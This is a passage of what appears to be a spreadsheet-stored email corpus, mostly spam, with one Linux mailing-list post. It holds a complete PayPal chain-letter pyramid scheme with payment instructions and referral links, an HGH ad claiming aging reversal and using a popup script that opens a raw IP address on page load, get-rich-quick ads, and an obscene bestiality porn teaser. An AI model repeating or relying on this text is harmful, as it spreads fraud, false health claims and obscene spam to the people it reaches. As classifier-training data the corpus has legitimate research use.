       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;International Dial In 18 cents per minute
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#666600 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;G=
 et the best 
       quality, the easiest to use, and lowest rate in the 
       industry.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000066 size=3D4&gt;If you like saving m=
 oney, fill 
       out the form below and one of our consultants will contact 
   you.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#000066 size=3D2&gt;Required Input Field&lt;FONT color=3D#66660=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:conference1032@eudoramail.com?subject=3DAudioC=
 _Inquiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font c=
 olor=3D#666600
       size=3D1&gt;To be removed from our list, please  
       &lt;A href=3D"mailto:d_lete1571@eudoramail.com?subject=3DRemove_Confere=
 ncing"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Aug 11, 2002 at 11:17:47AM +0100, wintermute mentioned:
 &gt; &gt; The impression I get from reading lkml the odd time is
 &gt; &gt; that IDE has gone downhill since Andre Hedrick was 
 &gt; &gt; effectively removed as maintainer. Martin Dalecki seems
 &gt; &gt; to have been unable to further development without 
 &gt; &gt; much breakage. 
 &gt; 
 &gt; Hmm... begs the question, why remove Handrick?
 &gt; If it ain't broke, don't fix it.
  See, the IDE subsystem is like the One Ring. It's kludginess, due to
 having to support hundreds of dodgy chipsets &amp; drives means that it is
 inherintly evil. A few months of looking at the code can turn you sour.
 Years of looking at it will turn you into an arsehole.
  They haven't found a hobbit that can code, so mortal humans have to
 suffice. 
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: See a Horny Teen Girl Do a horse with a 31 inch C*ck it's FREE! -pkqolhil
</t>
  </si>
  <si>
    <t xml:space="preserve">
 SEE a Teen Farm Girl Do it with her horse see it Free!
 You think you have seen some pretty crazy p*rn on the 
 internet?YOU HAVEN'T SEEN SH*T! I saw the most unbelievable 
 movie clip ever to grace the internet! These guys put up a 
 clip of a beautiful teen farm girl who actually f*cks her horse!
 NO BULLSHIT,SHE ACTUALLY F*CKS A HORSE WITH A 31 INCH C*CK!
 http://www.netvisionsenterprises.com/lpz/
 wz^argabgrvap(pbz
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Testing a system, please delete
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_006C_6B8D6A65.3C3C56F
 Content-Type: text/plain
 Content-Transfer-Encoding: base64
 UGxlYXNlIGZvcmdpdmUgdGhlIGludHJ1c2lvbiwgdGhpcyBpcyBhIG9uZSB0aW1lIG9ubHkg
 dGVzdCwgcGxlYXNlIGRlbGV0ZS4gDQpZb3Ugc2hvdWxkIG5vdCByZWNlaXZlIGFueSBhZGRp
 dGlvbmFsIGVtYWlscyBmcm9tIHRoaXMgYWRkcmVzcywgaWYgeW91IGRvIHBsZWFzZSBzZW5k
 IGFuIGVtYWlsIA0Kd2l0aCByZW1vdmUgYXMgc3ViamVjdCB0bzoNCg0KdGVzdDc5OTFAeWFo
 b28uY29tDQoNClRoYW5rIHlvdSBmb3IgeW91ciB1bmRlcnN0YW5kaW5nLg0KDQogICAg
 ------=_NextPart_000_006C_6B8D6A65.3C3C56F--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Turn $5 into $20k- ( Pay Pal ) vdbs
</t>
  </si>
  <si>
    <t xml:space="preserve">THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301
 TO REMOVE YOURSELF SEND A BLANK E-MAIL TO:removal992002@yahoo.com
 Hi,
 You most likely have seen or heard about 
 "The Letter" $5.00 Paypal Program" that has been seen lately 
 on 20/20 and OPRAH WINFREY...etc... How would you like 
 to generate more income through a different avenue? What 
 if it took only an hour to set it up? Even if you are already in another 
 program, stay with it, but do yourself a favor and DO THIS ONE as well. 
 There 
 is NO LIMIT to the income you can generate from this business!!
 THE FACTS ARE SIMPLE;- IF YOU NEED TO MAKE A FEW
 THOUSAND DOLLARS REALLY FAST, THEN THIS PROGRAM I'M GOING TO SHARE WITH 
 YOU 
 IS THE WAY TO DO IT! IT'S THE FASTEST, EASIEST PROGRAM YOU WILL EVER DO!!!
 Here's something which (I trust) will be of interest
 to you! Please read all of this. This is not something 
 that I would normally look at, except that I read an 
 article in the Wall Street Journal on 6/16/2001 about 
 PayPal and, when I came across this concept I knew it 
 would work because, as a member of Pay Pal, I had
 already experienced their efficiency and good standing. 
 You can complete this whole process in one hour and you 
 will never forget the day you decided to do so!!! Oh! 
 Did I say FAST? By fast I mean 'the speed of the 
 Internet-type fast.' Everything is done on the
 Internet by E-mail.
 NEED PROOF? Here are just two testimonials from
 individuals who decided to invest nothing more than a 
 little of their time.
 TESTIMONIALS FROM:
 Tony Stevens, Vandenberg AFB, CA:
 Hey! I got your e-mail! YOU ROCK! I sent it to all of
 our frat brothers.....and while I haven't seen my $20 
 grand yet, I'm up to $8,285. Hook me up when you run 
 this program again........
 Mary Gathers, Columbia, SC:
 Hey cuz! This is Mary. I only have one thing to say to
 you... OH MY GOD! I sent 20 e-mail's out like you said 
 and went on vacation. When I got back, my account was 
 up to over $12,000! I owe you!
 GETTING STARTED.
 If you're not already a user, the very first thing you
 need to do is go to PayPal and sign up. It takes two minutes 
 and PayPal will deposit $5.00 in your account. That makes this 
 program FREE!
 Here's the link:
 https://www.paypal.com/refer/pal=larryspaypal%40yahoo.com
 BE SURE TO SIGN UP FOR A PREMIER (FREE) ACCOUNT! OR YOU'LL BE LIMITED TO 
 $100 
 DOLLARS ONLY!!! YOU WILL MAKE MUCH MORE THAN THIS!!!
 Then...... E-mail $5.00 from your PayPal account ($5.00 free) 
 to the FIRST name on the list (No.1) along with a little note
 like "Please add me to your mailing list." BE PREPARED TO GET
 EXCITED.... YOU 
 WON'T BE DISAPPOINTED!!! Don't laugh! Try this while you wait for the 
 others 
 to start working. One hour of work to get started - no mailing lists. No 
 printing, copying or waiting and the concept is 100% legal (refer to US 
 Postal and 
 Lottery Laws, Title 18, Section 1302 and 1341, or Title 18, 
 Section 3005 in the US code, also in the code of Federal 
 Regulations, Volume 16, Sections 255 and 436, which state a 
 product or service must be exchanged for money received). 
 Here's How It Works. Unlike many other programs, this 
 THREE LEVEL PROGRAM is more realistic and much, much
 faster. Because it is so easy, the response rate is VERY 
 HIGH, VERY FAST-Internet E-mail FAST-and you will see 
 results in just two weeks or less! JUST IN TIME FOR NEXT 
 MONTHS BILLS! You need only mail out 20 copies (not 200 
 or more as in other programs). Ideally, you should
 send them to people who send their programs to you or to 
 personal contacts who are already working on the web, 
 because they know these programs work and they are already 
 believers in the system! Besides, this program is 
 MUCH, MUCH FASTER and has a HIGHER RESPONSE RATE! Even if you are already 
 in 
 another program, stay with it, but do
 yourself a favor and DO THIS ONE as well. START RIGHT NOW! 
 It's simple and will only cost $5.00 max. It will pay off long 
 before others even begin to receive letters! Just give ONE 
 person a $5.00 gift (REMEMBER THOUGH, this $5.00 is the $5.00 YOU GET 
 WHEN 
 YOU SIGN UP FOR YOUR new PayPal account). That's all! If you already have 
 a 
 PayPal account and do not receive the $5.00, feel free to donate a $5.00 
 GIFT 
 to
 the person in the No.1 spot and add your name on the list 
 at No.3 position having moved up the remaining two. Follow 
 the simple instructions and in two weeks you will have $20,000 
 in your bank account!
 Because of the VIRTUALLY ZERO INVESTMENT, SPEED and HIGH PROFIT 
 POTENTIAL, 
 this program has a VERY HIGH RESPONSE RATE! All from just one $5.00 
 transaction that you get from PayPal!!!
 Follow These Simple Instructions: 
 E-mail the $5.00 from your Paypal account to the FIRST 
 name on the list (No.1) along with a note saying 
 "subscribe me to your mailing list". Only the first 
 person on the list gets your name and $5.00 gift. 
 Edit the list, removing the FIRST (No.1) NAME FROM THE LIST. Move the 
 other 
 two names UP and ADD YOUR NAME. Don't try to add your name in the first 
 place 
 in order to earn money fast! 
 If you do that, you will ONLY reach people you send e-
 mail to then your name will be immediately removed
 from the No.1 place and you can't reach more people! But if 
 you add your name on the No.3 place, there will be tons of 
 people receiving e-mail's later and when your name is No.1!!! 
 NOTE: Do not forget to replace the PayPal referring URL in 
 the body of the letter with your own PayPal referring URL. 
 Send out 20 copies (minimum) of this letter.
 ALSO NOTE: By sending this letter and the payment via E-MAIL, the 
 response 
 time is much faster... ELECTRONIC TRANSFER INTERNET FAST! 
 Consider this! Millions of people surf the Internet
 everyday, all day, all over the world! Here are the 3 people 
 to start with. Sign up, send $5.00 to the first person, move 
 the other two up to Nos 1 &amp; 2 respectively and add your own 
 e-mail address at No.3. Be sure to use your email address that is 
 associated 
 with your PayPal account.
 *************************************
 1.  csreddy3@rediffmail.com
 2.  tomk4@prodigy.net
 3.  larryspaypal@yahoo.com 
 *************************************
 There are fifty thousand new people who get on the
 Internet every month! An excellent source ofemail addresses 
 is the people who send you offers by email.
 The source is UNLIMITED! It boggles my mind to
 think of all the possibilities! Mail, or should I 
 say 'E-mail', your letter and payment TODAY! It's 
 so easy. One hour of your time, THAT'S IT!
 To send your letter by e-mail, copy this ENTIRE PAGE
 and paste it in the message of your E-mail. 
 TO DO THIS:
 1. Go in your toolbar to "edit" and "select all"
 2. Go in your toolbar to "edit" and select "copy"
 3. Start (compose) a new E-mail message (make sure
 it's PLAIN TEXT so everyone can view it!)
 4. Fill in your Address and Subject Box
 5. Go to "edit" and "paste" (Then you can format it
 anyway you want!)
 Now you can edit the addresses with ease. Delete the
 top name, adding your name and address to the bottom 
 of the list, then simply changing the numbers. Remember, 
 YOUR NAME goes on the BOTTOM and the other 2 names move up. But DO NOT 
 forget 
 to send $5.00 via PayPal (along 
 with your note) to the position #1 - TOP E-MAIL
 address before deleting it!
 NOTE: Be sure to replace the PayPal referring URL in
 this e-mail of the letter with your own PayPal 
 referring URL;
 https://www.paypal.com/refer/pal=larryspaypal%40yahoo.com
 THERE'S NOTHING MORE TO DO.
 When your name reaches the first position in a few
 days, it will be your turn to collect your MONEY!
 The money will be sent to you by 2,000 to 4,000 people
 like yourself, who are willing to invest one hour to 
 receive $20,000 in cash! That's all! There will be a 
 total of $20,000 in $5.00 bills in your mailbox (account) 
 in two weeks. $20,000 for one hour's work! This is 
 real money that you can spend on anything you wish!
 Just deposit it to your own bank account or spend it 
 directly from your PayPal account!!! It's just that 
 easy!!! I think it's WORTH IT, don't you?
 GO AHEAD--- TRY IT!!! EVEN IF YOU MAKE JUST 3 OR 4
 THOUSAND, WOULDN'T THAT BE NICE?
 IF YOU TRY IT, IT WILL PAY! CAN YOU DO IT AGAIN? OF
 COURSE YOU CAN---
 This plan is structured for everyone to send only 20
 letters each. However, you are certainly not limited 
 to 20. Mail out as many as you want. Every 20 letters 
 you send has a return of $20,000 or more. If you can 
 E-MAIL forty, sixty, eighty, or whatever, GO FOR IT! 
 THE MORE YOU PUT INTO IT THE MORE YOU GET OUT OF IT! Each time you run 
 this 
 program, just follow steps 1
 through 3 and everyone on your gift list benefits! 
 Simple enough? You bet it is! Besides, there are no 
 mailing lists to buy (and wait for), and trips to the 
 printer or copier, and you can do it again and again 
 with your regular groups or gift givers, or start up 
 a new group. Be SURE and PAY the first person on the 
 list. This is proof that you paid to get put on the 
 list which is the service rendered to make all this 
 legal!!! Why not? It's working! Each time you receive 
 an MLM offer, respond with this letter! Your name will 
 climb to the number one position at dizzying rates. 
 Follow the simple instructions, and above all, PLEASE 
 PLAY FAIR. That's the key to this program's success. 
 Your name must run the full gamut on the list to produce 
 the end results. Sneaking your name higher up on the list 
 WILL NOT produce the results you think, and it only cheats 
 the other people who have worked hard and have earned the 
 right to be there. So please, play by the rules and the 
 $$$ will come to you!
 $$$ E-MAIL YOUR LETTERS OUT TODAY! Together we will 
 prosper! $$$ You are probably skeptical of this, 
 especially with all the different programs out there 
 on the web, but if you don't try this you will 
 never know. That's the way I felt. I'm glad I did it!
 I've been watching this type of program for years and
 this is about as easy and fast as you can get it and 
 it can even be free to try now with Pay Pal, no stamps, 
 no envelopes, no copies to be made - just a little effort 
 and faith!!! This program really "Keeps It Short and Simple"! 
 OH BY THE WAY....each time someone signs up with your link 
 under your name... you also make $5.00 from PayPal...
 so they pay to open up the account but they also pay you when 
 someone signs up from being referred by you. AWESOME! 
 Let's all make some serious money 
 $$$$$$
 CLICK HERE TO BEGIN:
 https://www.paypal.com/refer/pal=larryspaypal%40yahoo.com
 Play by the rules, this doesn't cost anything but your
 time, and if everyone plays fair everyone WINS.
 FOLLOWING ARE SOME NOTES ABOUT PayPal WHICH YOU MAY FIND HELPFUL:PayPal 
 lets 
 you pay anyone with an e-mail address and is the world's No.1 online 
 payment 
 service - it's accepted on over 3 million eBay T auctions and thousands 
 and 
 thousands of online shops. You can also use PayPal to 
 pay your friends - example; it's a convenient way to 
 split the phone bill with your roommate, send cash to your kids in 
 college,or 
 send cash to someone in another country. Better yet, you can also 
 earn $5 while you do it. Each time someone signs up for an account and 
 completes the Refer-a-Friend requirements, we'll give you a $5 BONUS! 
 When 
 you send money through Pay Pal, you can fund your payments with your 
 credit 
 card or checking account. You won't have to worry about your privacy, 
 because 
 PayPal keeps your accounting information safe. Making a purchase with 
 PayPal 
 is more secure than mailing a check or giving your credit card number to 
 a 
 stranger. That's why over 9 million people from around the world use 
 PayPal 
 to move money.
 Signing up for a PayPal account is easy. It takes only
 a couple of minutes and, if you complete the bonus 
 requirements PayPal will automatically add $5 to your 
 account balance. To learn more about PayPal visit the 
 web site at
 https://www.paypal.com/refer/pal=larryspaypal%40yahoo.com
 "Best of the Web" -Forbes
 "Using the service is actually safer than a check or
 money order"- Wall Street Journal
 "PayPal can play a major role in your life. You can
 use it to pay for stuff at auction sites, settle 
 dinner debts with friends or nudge your cousin to 
 repay that $50 he borrowed at the family reunion.- Time
 PS. Does this sound too good? Well maybe to some skeptics it
 is. But it actually works, and is worth 
 the few minutes of your time now. 
 P.S.S. If You Decide to Join in on this Venture Please Return a blank 
 email 
 to the last email address on the list (#3) with "Thanks, I'll Join" in
 the 
 subject line. This Helps everyone keep track of their progress. You Will 
 Not 
 be added to My Email List
 ofsknxxdqgtgqvsoiytkivajvtj
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HGH Myth --- Learn the Truth
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body onload="window.open('http://202.101.163.34:81/ultimatehgh_run/')" bgColor="#CCFF66" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, jm@netnoteinc.com&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Human Growth Hormone Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;
 As seen on NBC, CBS, and CNN, and even Oprah! The health&lt;br&gt;
 discovery that actually reverses aging while burning fat,&lt;br&gt;
 without dieting or exercise! This proven discovery has even&lt;br&gt;
 been reported on by the New England Journal of Medicine.&lt;br&gt;
 Forget aging and dieting forever! And it's Guaranteed!&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;Duration Of Penile Erection&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;
 &lt;p align="center"&gt;&lt;a href="http://202.101.163.34:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
   Our Web Site and Learn The Facts : Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;a href="http://202.96.124.10:81/ultimatehgh_run/"&gt;&lt;font size="4"&gt;&lt;b&gt;OR 
   Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;div align="center"&gt;&lt;br&gt;
   You are receiving this email as a subscr&lt;!----&gt;iber&lt;br&gt;
   to the Opt&lt;!----&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!----&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://202.96.124.10:81/ultimatehgh_run/remove.php?userid=jm@netnoteinc.com"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Two Weeks To $3,500 Cash...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;body bgcolor="fedf25"&gt;
 	&lt;table border=0 cellpadding=0 cellspacing=0 align="center"&gt;
 		&lt;tr&gt;
 			&lt;td rowspan=4 valign="top"&gt;&lt;a href="http://www.businessopp2002.com/moneyestate3/"&gt;&lt;img src="http://www.businessopp2002.com/images/retb01left.gif" alt="" width="15" height="17" vspace="54" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 			&lt;td height="32"&gt;&lt;a href="http://www.businessopp2002.com/moneyestate3/"&gt;&lt;img src="http://www.businessopp2002.com/images/retb01top.gif" alt="" width="81" height="32" hspace="23" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;&lt;td height="143"&gt;&lt;a href="http://www.businessopp2002.com/moneyestate3/"&gt;&lt;img src="http://www.businessopp2002.com/images/retb01header.jpg" width="485" height="143" alt="" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;tr&gt;&lt;td height="284"&gt;&lt;a href="http://www.businessopp2002.com/moneyestate3/"&gt;&lt;img src="http://www.businessopp2002.com/images/retb01text.gif" width="485" height="284" alt="" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;tr&gt;&lt;td height="96"&gt;&lt;a href="http://www.businessopp2002.com/moneyestate3/"&gt;&lt;img src="http://www.businessopp2002.com/images/retb01bottom.gif" width="485" height="96" alt="" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/body&gt;&lt;div align="center"&gt;&lt;font size="-1"&gt;To opt-out of our database  &lt;a href="http://www.businessopp2002.com/remove.htm" style="color: Olive;"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;/div&gt;
 &lt;br&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Did I give you the money yet?          DLRA
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;New Page 1&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face=3D"Arial" size=3D"6" color=3D"#800000"&gt;You can live a life o=
 f luxury 
 only if you work for yourself.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial" size=3D"6" color=3D"#800080"&gt;Absolutely
 &lt;a href=3D"http://7x24.businessonlinenow.com/cl5/newhome/"&gt;&lt;font color=3D"=
 #FF0000"&gt;
 FREE&lt;/font&gt;&lt;/a&gt; information on a home based business.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D"Arial" size=3D"6" color=3D"#FF0000"&gt;Just
 &lt;a href=3D"http://7x24.businessonlinenow.com/cl5/newhome/"&gt;CLICK
 &lt;font color=3D"#FF0000"&gt;HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Prospects...by the millions!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_4A62C_01C204E3.5E68D0D0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  FREE PROSPECTS ...by the millions!
  Online prospecting that works.	
  FREE Retirement and Benefit Plan Data	
  	ERISA Form 5500 Filings
 Financial reports of qualified retirement and welfare benefit plans of
 U.S. employers
  	IRS Form 5310
 Companies who have applied to the IRS to terminate their retirement plan
  	Public Pension Funds
 Summary data on pension funds for state, county and municipal government
 employees
  	Terminating Pension Plans
 Defined benefit plans that recently teminated as filed with the Pension
 Benefit Guaranty Corporation
  	EIN Finder
 Find that tax identification number you need! Over 1.3 million in our
 database	 
 Click Here to register for FREE Today!
 Free ERISA .com &lt;http://www.freeerisa.com&gt; 	 
 FreeERISA.com - Free access to pension and benefit data
 &lt;http://www.freeerisa.com&gt; 	 
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt; 
 Lega Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_4A62C_01C204E3.5E68D0D0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free Prospects...by the millions!&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" border=3D"1" =
 bordercolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
       &lt;img src=3D"http://iiq.us/images/freeerisa/20020510-101.gif" =
 width=3D"550" height=3D"96"alt=3D"FREE PROSPECTS ...by the =
 millions!"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/freeerisa/20020510-102.jpg" =
 width=3D"550" height=3D"241" alt=3D"Online prospecting that works."&gt;
     &lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	  &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/freeerisa/spacer.gif" =
 width=3D"8" height=3D"8"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-3.gif" width=3D"540" =
 height=3D"37" alt=3D'FREE Retirement and Benefit Plan Data'&gt;&lt;/td&gt;
         &lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"40" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/freeerisa/20020510-4.gif" width=3D"40" =
 height=3D"20"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;ERISA Form 5500 Filings&lt;/b&gt;&lt;br&gt;
